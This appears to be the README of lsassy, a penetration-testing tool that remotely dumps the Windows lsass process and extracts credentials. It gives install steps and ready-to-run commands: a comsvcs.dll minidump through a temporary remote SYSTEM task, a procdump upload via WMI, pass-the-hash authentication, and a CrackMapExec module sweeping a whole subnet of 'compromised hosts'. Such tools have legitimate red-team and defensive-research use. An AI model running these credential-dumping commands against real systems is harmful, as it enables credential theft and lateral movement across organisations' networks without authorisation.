lsassy

Python library to remotely extract credentials.

This library uses impacket projects to remotely read necessary bytes in lsass dump and pypykatz to extract credentials.

Changelog v3.1.7

• Fix table output
• Compatible with python < 3.11
• Handle --no-color parameter

Install

python3 -m pip install lsassy

Usage

lsassy [--hashes [LM:]NT] [<domain>/]<user>[:<password>]@<target>

Advanced

This tool can dump lsass in different ways.

comsvcs.dll method (Default)

This method only uses built-in Windows files to extract remote credentials. It uses minidump function from comsvcs.dll to dump lsass process. As this can only be done as SYSTEM, it creates a remote task as SYSTEM, runs it and then deletes it.

lsassy [--hashes [LM:]NT] [<domain>/]<user>[:<password>]@<target>

Procdump method

This method uploads procdump.exe from SysInternals to dump lsass process. It will first try to execute procdump using WMI, and if it fails it will create a remote task, execute it and delete it.

lsassy [--hashes [LM:]NT] -p /path/to/procdump.exe [<domain>/]<user>[:<password>]@<target>

Remote parsing only

lsassy can parse an already dumped lsass process.

lsassy [--hashes [LM:]NT] --dumppath /share/path/to/dump.dmp [<domain>/]<user>[:<password>]@<target>

CrackMapExec module

I wrote a CrackMapExec module that uses lsassy to extract credentials on compromised hosts

CrackMapExec module is in cme folder: CME Module

Examples

lsassy

# RunDLL Method
lsassy adsec.local/jsnow:Winter_is_coming@dc01.adsec.local

# Procdump Method
lsassy -p /tmp/procdump.exe adsec.local/jsnow:Winter_is_coming@dc01.adsec.local

# Remote parsing only
lsassy --dumppath C$/Windows/Temp/lsass.dmp adsec.local/jsnow:Winter_is_coming@dc01.adsec.local

# NT Hash Authentication
lsassy --hashes 952c28bd2fd728898411b301475009b7 Administrator@desktop01.adsec.local

CME Module

crackmapexec smb 10.0.0.0/24 -d adsec.local -u Administrator -p Passw0rd -M lsassy -o BLOODHOUND=True NEO4JPASS=bloodhound

Copyright (c) 2018 Tamas Jos

Source: https://github.com/Hackndo/